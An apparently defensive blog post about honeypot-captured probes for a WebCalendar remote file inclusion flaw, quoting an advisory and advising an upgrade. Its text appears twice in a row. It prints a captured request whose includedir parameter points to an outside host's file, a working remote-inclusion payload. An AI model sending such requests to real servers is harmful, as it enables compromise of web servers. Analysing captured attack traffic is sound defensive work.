I couldn’t think of a catchy title, so
anyway…
We’ve received some packets in our smallpot nodes that utilize this
vulnerability, however, these packets only do a getting-to-know-you
thing instead of exploiting the machine.
What’s that again?
Like this: the packets look like this:
GET /webcalendar/tools/send_reminders.php?
includedir=http://xxx.xxx.xxx.xxx/~max4/…/t.txt? HTTP/1.1
The vulnerability is described as: (according to FrSirt – http://
www.frsirt.com /english/ advisories/2005/1513)
“A vulnerability was identified in WebCalendar, which may be
exploited by attackers to compromise a vulnerable web server. This
flaw is due to an input validation error in the
“send_reminders.php” script when processing a specially crafted
“includedir” parameter, which may be exploited by remote attackers
to include malicious files and execute arbitrary commands with the
privileges of the web server.”
So, the next step for me would be to get the target file, which
when accessed, shows the following:
<head>
<title>Vulner4bl3
Accesing t.txt (which is NOT a text file, btw), alerts the attacker
on which targets are vulnerable(obviously).
Upgrading WebCalendar is the solution, and is available here
anyway…
We’ve received some packets in our smallpot nodes that utilize this
vulnerability, however, these packets only do a getting-to-know-you
thing instead of exploiting the machine.
What’s that again?
Like this: the packets look like this:
GET /webcalendar/tools/send_reminders.php?
includedir=http://xxx.xxx.xxx.xxx/~max4/…/t.txt? HTTP/1.1
The vulnerability is described as: (according to FrSirt – http://
www.frsirt.com /english/ advisories/2005/1513)
“A vulnerability was identified in WebCalendar, which may be
exploited by attackers to compromise a vulnerable web server. This
flaw is due to an input validation error in the
“send_reminders.php” script when processing a specially crafted
“includedir” parameter, which may be exploited by remote attackers
to include malicious files and execute arbitrary commands with the
privileges of the web server.”
So, the next step for me would be to get the target file, which
when accessed, shows the following:
<head>
<title>Vulner4bl3
Accesing t.txt (which is NOT a text file, btw), alerts the attacker
on which targets are vulnerable(obviously).
Upgrading WebCalendar is the solution, and is available here